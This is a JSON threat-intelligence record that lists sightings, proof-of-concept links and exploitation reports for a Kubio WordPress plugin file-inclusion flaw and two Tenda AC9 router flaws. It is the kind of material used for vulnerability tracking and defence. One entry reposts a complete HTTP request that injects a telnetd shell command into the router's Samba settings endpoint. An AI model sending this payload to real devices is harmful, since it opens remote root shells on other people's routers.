{"vulnerability": "CVE-2025-2294", "sightings": [{"uuid": "38d3eb28-4e26-4578-a786-2d74a16f812a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22946", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1498", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22946\n\ud83d\udd39 Description: Tenda ac9 v1.0 firmware v15.03.05.19 contains a stack overflow vulnerability in /goform/SetOnlineDevName, which may lead to remote arbitrary code execution.\n\ud83d\udccf Published: 2025-01-10T00:00:00\n\ud83d\udccf Modified: 2025-01-14T14:53:30.405Z\n\ud83d\udd17 References:\n1. https://noisy-caravel-a9a.notion.site/Tenda_AC9V1-0_V15-03-05-19_formSetDeviceName_sprintf_bof-16f898c94eac8057afcbceb63fda7d24", "creation_timestamp": "2025-01-14T15:11:57.000000Z"}, {"uuid": "ba442cc7-8fb1-41c3-bcfe-25401c3a52cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22949", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1499", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22949\n\ud83d\udd39 Description: Tenda ac9 v1.0 firmware v15.03.05.19 is vulnerable to command injection in /goform/SetSambaCfg, which may lead to remote arbitrary code execution.\n\ud83d\udccf Published: 2025-01-10T00:00:00\n\ud83d\udccf Modified: 2025-01-14T14:51:26.573Z\n\ud83d\udd17 References:\n1. https://noisy-caravel-a9a.notion.site/Tenda_AC9V1-0_V15-03-05-19_formSetSambaConf_doSystemCmd_CI-16f898c94eac80d5801bdaf777ac2b27", "creation_timestamp": "2025-01-14T15:12:02.000000Z"}, {"uuid": "c0afefcf-3317-4429-8e93-861a179fb50b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "https://t.me/rHz0d/11", "content": "\ud83d\udea8 Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion\n\n\ud83d\udcdd The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via the kubio_hybrid_theme_load_template function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.\n\nhttps://github.com/rhz0d/CVE-2025-2294", "creation_timestamp": "2025-05-21T15:02:40.000000Z"}, {"uuid": "a75ce72b-2ad3-4e7c-8677-50d06329ae22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "https://t.me/realcodeb0ss/22", "content": "", "creation_timestamp": "2025-04-04T08:04:16.000000Z"}, {"uuid": "731c6232-3c5f-44d6-b0dd-bb1e8595174c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "https://t.me/haj3imad/1578", "content": "https://securityonline.info/cve-2025-2294-targets-wordpress-plugin-with-90000-active-installs/", "creation_timestamp": "2025-04-04T01:03:18.000000Z"}, {"uuid": "b1140fd3-a40d-4536-9038-e4c69a1d58e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22946", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113804705459569518", "content": "", "creation_timestamp": "2025-01-10T15:13:15.352994Z"}, {"uuid": "0cd31c0f-31f0-47dd-b727-a8734cf0c3e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22946", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lfficjf2ln2a", "content": "", "creation_timestamp": "2025-01-10T15:15:35.279300Z"}, {"uuid": "2e436e27-fe2a-451e-9023-daec0a1658e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22949", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113804747178321116", "content": "", "creation_timestamp": "2025-01-10T15:23:52.032802Z"}, {"uuid": "93278caa-c833-441c-b10f-ec631899328b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "seen", "source": "https://bsky.app/profile/cyberalerts.bsky.social/post/3llg42kwfll2v", "content": "", "creation_timestamp": "2025-03-28T05:40:12.816468Z"}, {"uuid": "144c4dfd-06ac-478b-8a95-eac42618290b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "seen", "source": "https://bsky.app/profile/redteamnews.bsky.social/post/3llgh3qsdfb2c", "content": "", "creation_timestamp": "2025-03-28T08:57:43.685386Z"}, {"uuid": "3646127f-9e24-45bf-ab58-2c20d636cc45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3llwsemixdv2u", "content": "", "creation_timestamp": "2025-04-03T21:02:13.113563Z"}, {"uuid": "64980190-22ec-45d3-9cd3-b31def2ad270", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-01)", "content": "", "creation_timestamp": "2026-03-01T00:00:00.000000Z"}, {"uuid": "01b63a76-a257-4474-84c2-b990198f8f18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-28)", "content": "", "creation_timestamp": "2026-04-28T00:00:00.000000Z"}, {"uuid": "8ae9816e-f161-4295-8fb4-1e29f6d30309", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "Telegram/75Mb5uYpQosCyupAbaPXt3tVtlvlDXKkJ2DuCinTsyRQAIk", "content": "", "creation_timestamp": "2025-07-28T19:00:09.000000Z"}, {"uuid": "39bb9ee6-ebaf-43cd-80f3-ffc21c3949df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22949", "type": "seen", "source": "https://t.me/cvedetector/14961", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-22949 - Tenda Router Command Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-22949 \nPublished : Jan. 10, 2025, 4:15 p.m. | 38\u00a0minutes ago \nDescription : Tenda ac9 v1.0 firmware v15.03.05.19 is vulnerable to command injection in /goform/SetSambaCfg, which may lead to remote arbitrary code execution. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"10 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-10T18:00:41.000000Z"}, {"uuid": "f4042f7e-c729-4a61-834a-63a3be1d5559", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22946", "type": "seen", "source": "https://t.me/cvedetector/14959", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-22946 - Tenda AC9 Stack-Based Buffer Overflow Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-22946 \nPublished : Jan. 10, 2025, 3:15 p.m. | 37\u00a0minutes ago \nDescription : Tenda ac9 v1.0 firmware v15.03.05.19 contains a stack overflow vulnerability in /goform/SetOnlineDevName, which may lead to remote arbitrary code execution. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"10 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-10T17:10:31.000000Z"}, {"uuid": "d105c968-091a-4e8c-9bb0-5ab00ff2b00a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "Telegram/-_T7fiB1UH9VRuMWqeF5wAirAQ9WEH4yGxP0ggrYXPxHLtk", "content": "", "creation_timestamp": "2025-03-28T04:00:06.000000Z"}, {"uuid": "8e631c15-9f60-4296-9c0b-231836b65b3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "Telegram/jQJMvs9XJ8K5QMFoHfbltG_tHt24gUexxQXzcXTKNc5NbgE", "content": "", "creation_timestamp": "2025-03-28T06:00:23.000000Z"}, {"uuid": "76d4f360-c2b5-4339-8827-b6cb92867c85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "Telegram/L71BuzMDQtwQeP3qMSXL5bPr0jFw99y21r7TTnYYYvfojuk", "content": "", "creation_timestamp": "2025-04-04T05:00:06.000000Z"}, {"uuid": "ce9f2e82-2550-44a2-a1e2-4d487ff2d9b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "Telegram/gptxcG5Jvg83wR56zKKTs8fGBMXLE7PNQ-HCnd7IEVmsKx8", "content": "", "creation_timestamp": "2025-04-05T21:00:06.000000Z"}, {"uuid": "a6c3db2c-2ba4-49d3-a2e9-94db7e824f24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "Telegram/HZiUINgNQ2pS0R_w-XaSSj9Acn20hZO1_YKhU5CHrEZdOR8", "content": "", "creation_timestamp": "2025-04-15T21:44:07.000000Z"}, {"uuid": "16acd78d-d220-4e93-a65d-481a4a834ce0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "Telegram/TRVkTuyDxAehF6jM_1cr9XM-2CzqHAKy6-59Uq1bGVQsxDs", "content": "", "creation_timestamp": "2025-04-27T01:00:06.000000Z"}, {"uuid": "95c640cb-2d15-4dd8-804d-aae70a534e38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "Telegram/T5fLPVjbQAmUT_F5thE0SYrb6scbFCitau7fM2VIVPECaRaLEMs", "content": "", "creation_timestamp": "2025-04-04T15:00:27.000000Z"}, {"uuid": "f0a66c3a-c138-4956-b121-1ab2b9a66276", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "seen", "source": "Telegram/CW8VnE99Sl7DapnZTFot4QytcX1R_bppC1U-HN6r00k7KKa5HxE", "content": "", "creation_timestamp": "2025-04-04T15:00:27.000000Z"}, {"uuid": "27ee055c-ded3-4a40-a0ca-e07232e06159", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22949", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lfflpbrjer2k", "content": "", "creation_timestamp": "2025-01-10T16:16:24.365704Z"}, {"uuid": "403b0f1a-21ca-4397-af68-d25091ab7ace", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-22949", "type": "seen", "source": "https://bsky.app/profile/securitycipher.bsky.social/post/3lfvwe63hus2q", "content": "", "creation_timestamp": "2025-01-17T04:09:38.493674Z"}, {"uuid": "9aac6491-7b63-4e52-81f7-b51c73cd714f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lllebdahn62t", "content": "", "creation_timestamp": "2025-03-30T07:50:28.264365Z"}, {"uuid": "7b799ba3-8109-45b3-a029-e019a53e6682", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-db35b054-b7937bb90e512196", "content": "", "creation_timestamp": "2025-04-04T14:50:07.631870Z"}, {"uuid": "ec277739-1ebb-4987-bdd7-b910fde843c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-db35b054-b7937bb90e512196", "content": "", "creation_timestamp": "2025-04-04T14:50:07.626774Z"}, {"uuid": "e9a2b1ef-1721-4916-8541-c1350bdefa6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-24)", "content": "", "creation_timestamp": "2025-06-24T00:00:00.000000Z"}, {"uuid": "15681eca-97ab-4675-a4b9-7fa918c0edec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "seen", "source": "https://bsky.app/profile/bolhasec.com/post/3lmvdlngedx2p", "content": "", "creation_timestamp": "2025-04-16T00:30:10.724711Z"}, {"uuid": "13f871e4-edae-4729-80f2-7d5a9455f8e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lnbkcd5bjr2u", "content": "", "creation_timestamp": "2025-04-20T21:02:10.958588Z"}, {"uuid": "56f8091a-cd28-4ae0-9a19-a7d68653eb49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "seen", "source": "MISP/f2f93f16-9318-44b1-9be3-2d3346ca540c", "content": "", "creation_timestamp": "2025-08-10T18:27:44.000000Z"}, {"uuid": "d111e352-caf6-4a2e-a211-0d471b513c70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-11)", "content": "", "creation_timestamp": "2025-11-11T00:00:00.000000Z"}, {"uuid": "e7845ba6-1699-4000-80df-30f5a37fda31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115968898862082584", "content": "", "creation_timestamp": "2026-01-27T20:16:06.731370Z"}, {"uuid": "64893def-3c75-4ae2-9083-2bb721567187", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "https://t.me/cvexploit/32", "content": "", "creation_timestamp": "2025-04-04T13:00:24.000000Z"}, {"uuid": "4d6c5e2b-66f4-4653-b142-48d8409ce300", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "https://t.me/cvexploit/33", "content": "https://securityonline.info/cve-2025-2294-targets-wordpress-plugin-with-90000-active-installs/", "creation_timestamp": "2025-04-04T13:00:24.000000Z"}, {"uuid": "075ceb20-34c1-45d2-b650-768ec6fe50a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "https://t.me/rHz0d/12", "content": "PoC CVE-2025-2294 \ud83d\ude3a\n\nhttps://youtu.be/rPU5PipVqwg\n\nEnjoy, first video btw", "creation_timestamp": "2025-04-15T19:40:28.000000Z"}, {"uuid": "43069869-5cab-4406-8dd6-983d19df27cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/29531", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-2294 < Wordpress Kubio[Plugin] - Local File Inclusion[LFI].\nURL\uff1ahttps://github.com/realcodeb0ss/CVE-2025-2294-PoC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-03T23:21:02.000000Z"}, {"uuid": "4c9da763-5138-4dfb-acf6-ee6cbf5fbbd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9264", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2294\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via thekubio_hybrid_theme_load_template function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.\n\ud83d\udccf Published: 2025-03-28T04:22:41.656Z\n\ud83d\udccf Modified: 2025-03-28T04:22:41.656Z\n\ud83d\udd17 References:\n1. https://www.wordfence.com/threat-intel/vulnerabilities/id/2fb44c6e-520e-4a9f-9987-8b770feb710d?source=cve\n2. https://plugins.trac.wordpress.org/browser/kubio/tags/2.5.1/lib/integrations/third-party-themes/editor-hooks.php#L32", "creation_timestamp": "2025-03-28T04:29:56.000000Z"}, {"uuid": "2ce970f0-dad7-4e8f-b7e4-bf3985a02d4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "https://t.me/realcodeb0ss/24", "content": "https://securityonline.info/cve-2025-2294-targets-wordpress-plugin-with-90000-active-installs/", "creation_timestamp": "2025-04-03T22:58:49.000000Z"}, {"uuid": "1782a024-fef8-43ff-bcd8-f5ee7bf625f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "Telegram/6PnrgR2Pod1_fgzwd7Qbvk4OxPmNOlP8LA4-B8qthyeL2tI", "content": "", "creation_timestamp": "2025-04-04T13:00:35.000000Z"}, {"uuid": "501f0ffa-6ff3-411a-a586-20e7ca7bd80a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "Telegram/29q4YJeI3D1nLJ-8-sEfpXbwMYvQFqXZNAGW8mKXFHaKGo8", "content": "", "creation_timestamp": "2025-04-04T13:00:34.000000Z"}, {"uuid": "247deb38-9501-4280-afb7-5ea0f81f5121", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "seen", "source": "https://t.me/cvedetector/21376", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-2294 - Kubio AI Page Builder for WordPress Local File Inclusion Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-2294 \nPublished : March 28, 2025, 5:15 a.m. | 52\u00a0minutes ago \nDescription : The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via thekubio_hybrid_theme_load_template function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. \nSeverity: 9.8 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"28 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-28T07:42:42.000000Z"}, {"uuid": "a1267349-affc-4f89-ad21-48ca11fd810c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "seen", "source": "https://t.me/CyberBulletin/2869", "content": "\u26a1CVE-2025-2294 Targets WordPress Plugin with 90,000+ Active Installs.\n\n#CyberBulletin", "creation_timestamp": "2025-03-31T16:24:54.000000Z"}, {"uuid": "3ef93887-bfba-4733-8a8b-c8b352aca397", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "Telegram/IpSkdng-DvuBirFh-8nYsY3OgxKRFd_quSrS72XmwTlTwLs", "content": "", "creation_timestamp": "2025-03-28T00:00:06.000000Z"}, {"uuid": "65f6e6bf-5d0a-4190-b140-406797c6a4ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "Telegram/mdXOdpecd3YI3AgX0TS0pDTAKq9R7rqKGN3qwqhQ8UcEmno", "content": "", "creation_timestamp": "2025-03-31T21:00:08.000000Z"}, {"uuid": "034f6b7e-6593-4e94-b612-2e02be53352f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "published-proof-of-concept", "source": "Telegram/Tz2s4dWBDCMxptFMqjH1pfsiKt1Jb6F0OQY1E-Dj9Kb60Ks", "content": "", "creation_timestamp": "2025-04-16T13:00:08.000000Z"}, {"uuid": "12be70eb-81b6-4790-af5d-a3f203785697", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22949", "type": "exploited", "source": "https://t.me/haj3imad/908", "content": "Tenda_AC9V1.0_V15.03.05.19_formSetSambaConf_doSystemCmd_CI\n\nCVE-2025-22949\n\nPOST /goform/SetSambaCfg HTTP/1.1\nHost: 192.168.0.1\nContent-Length: 47\nX-Requested-With: XMLHttpRequest\nAccept-Language: zh-CN,zh;q=0.9\nAccept: */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36\nOrigin: http://192.168.0.1\nReferer: http://192.168.0.1/wifi_wps.html?random=0.5358142303799198&\nAccept-Encoding: gzip, deflate, br\nCookie: password=5f4dcc3b5aa765d61d8327deb882cf99isqtgb\nConnection: keep-alive\n\naction=del&usbName=1;telnetd -l /bin/sh -p 7890\n\n#exploit #poc", "creation_timestamp": "2025-02-19T05:21:03.000000Z"}, {"uuid": "7c046be7-fa4b-47eb-b98b-de2af8f4d4ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-22946", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lffk6aablx2w", "content": "", "creation_timestamp": "2025-01-10T15:48:59.046077Z"}, {"uuid": "062ae713-b2d8-4ce0-ba11-93f5051f5d83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2294", "type": "seen", "source": "MISP/f2f93f16-9318-44b1-9be3-2d3346ca540c", "content": "", "creation_timestamp": "2025-09-10T07:47:57.000000Z"}]}